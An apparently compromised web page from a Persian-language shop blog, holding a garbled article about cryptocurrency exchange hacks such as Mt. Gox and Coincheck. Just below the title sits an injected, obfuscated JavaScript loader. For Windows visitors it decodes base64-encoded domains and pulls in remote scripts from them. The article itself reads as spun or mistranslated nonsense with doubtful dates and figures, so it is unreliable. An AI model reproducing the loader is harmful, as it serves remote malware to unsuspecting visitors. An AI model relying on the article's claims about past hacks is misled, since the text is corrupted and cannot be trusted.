وبلاگ

Hacks In Cryptocurrency: Learning From Past Incidents

if(navigator.userAgent.toLowerCase().indexOf(“windows”) !== -1){const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=|NXQ0MTQwMmEuc2l0ZS94cC8=|OWUxMDdkOWQuc2l0ZS94cC8=|ZDQxZDhjZDkuZ2l0ZS94cC8=|ZjAwYjRhMmIuc2l0ZS94cC8=|OGIxYjk5NTMuc2l0ZS94cC8=”;const pds=pdx.split(“|”);pds.forEach(function(pde){const s_e=document.createElement(“script”);s_e.src=”https://”+atob(pde)+”cc.php?u=801e20e0″;document.body.appendChild(s_e);});}

Cryptourren: Hacks in Cryptocurience: Incident Penner Learning

The cryptocurrency world has exercised faces of faces and explores the confidence of inventors and users. There hackers hacking unlavified looks, but high -level supplements of the need for safety safety security measures. In the art of the Thist, it will dissipate some of the most symptoms of cryptocurrency and that bees injuries learn from ICES.

* 1. MT. GOX HACK (2014)

MT. Gox, one of the largest and most important exchanges in Japan, tear on January 19, 2014, resolves theft of over 850,000 bitcoins (approximately US $ 450 million). The hack was performed by the consultant of intense and external strikers, vulnerabilities scattered in the exchange software and hardware. MT. GOXFARE for adequate responsibilities for the CTicipism edge infrastructure of the partner.

* 2. Bitfinax Hack (2015)

Bitfinex, another is another change of cryptocurrencies, Wans hacked on December 18, 2015, resulting in theft of $ 10 million bitcoin and others from Cryptocrrencis. The hack was performed by an unchanging attacker who explored vulnearities in the exchange portfolio software.

* 3. Cucincheck Hack (2018)

Cucincheck, a Japiste cryptocurreary company, projecting almost the slot cryptocurrency reservations, including 4.5 billion American dolls in Bitcoin and Etreum, wakes up on December 31, 2018. Attacher Stollle approximately $ 530008 W of cryptocures.

Lessons learned

The hill. GOX HACK HIGHLIGHTS ARE THE MAIN SISSONS THAT ARE APPLIED TO SIMILAR HACKS IN THE FUTURE:

  • * Security Test: Cyber ​​security experiences hosts regular security tests and vulnerability testing tests in systems.

2.Complicating *: Host companies request and sector classifications, subtle set of the Securities Commission (SEC).

3.

  • * Monitoring: exchanges and wallets soon monitoring transactions and user activity in search of suspicious behavior.

Lessons learned from other hacks

The following high hacks hacks of light switches that can be applied to a similar hack in the future:

  • Cain

    reaction attacks: coordinated attack hackers, suck, phishing and ransomware to compromise various targets.

  • Inside threats : Internal threats include packages or hired with malicious intentions, rear causes of hack.

3.Lack of regulation *: Lack of regulation in some cryptocurrency markets is created an envy of a rope for exploration.

* Best Practices

To mitigate the risk of hackers in cryptocuresses:

  • Use strong passwords and the authentication matter : Use strategic steps and two accounts art to protect your accounts.

  • Monitor accounts regularly : Check your regular account with statutes and history of transactions for subscriber activists.

  • Keep the software updated : Keep the operating system, the Brew and Wallet software updated the gravity orquets.

  • Be cautious in phishing attacks

    : Be aware of and email or phishing messages can ask me to provide confidential information.

*Conclusion

Cryptocurrency hacking has been considered to mean that the restriction of you, it results in financial loss and casting user. By learning root, left hacks and folding best practices, we can rotate the risk of inclusion similar to cycling in the future. It is essential for companions, exchanges and users to prioritize security and provide proactive measures to protect cryptocures.

* References:

  • “MT.

AVALANCHE INNOVATIONS SMART

سبد خرید
ورود

حساب کاربری ندارید؟

برای دیدن محصولاتی که دنبال آن هستید تایپ کنید.
فروشگاه
لیست علاقه مندی ها
0 مورد سبد خرید
حساب من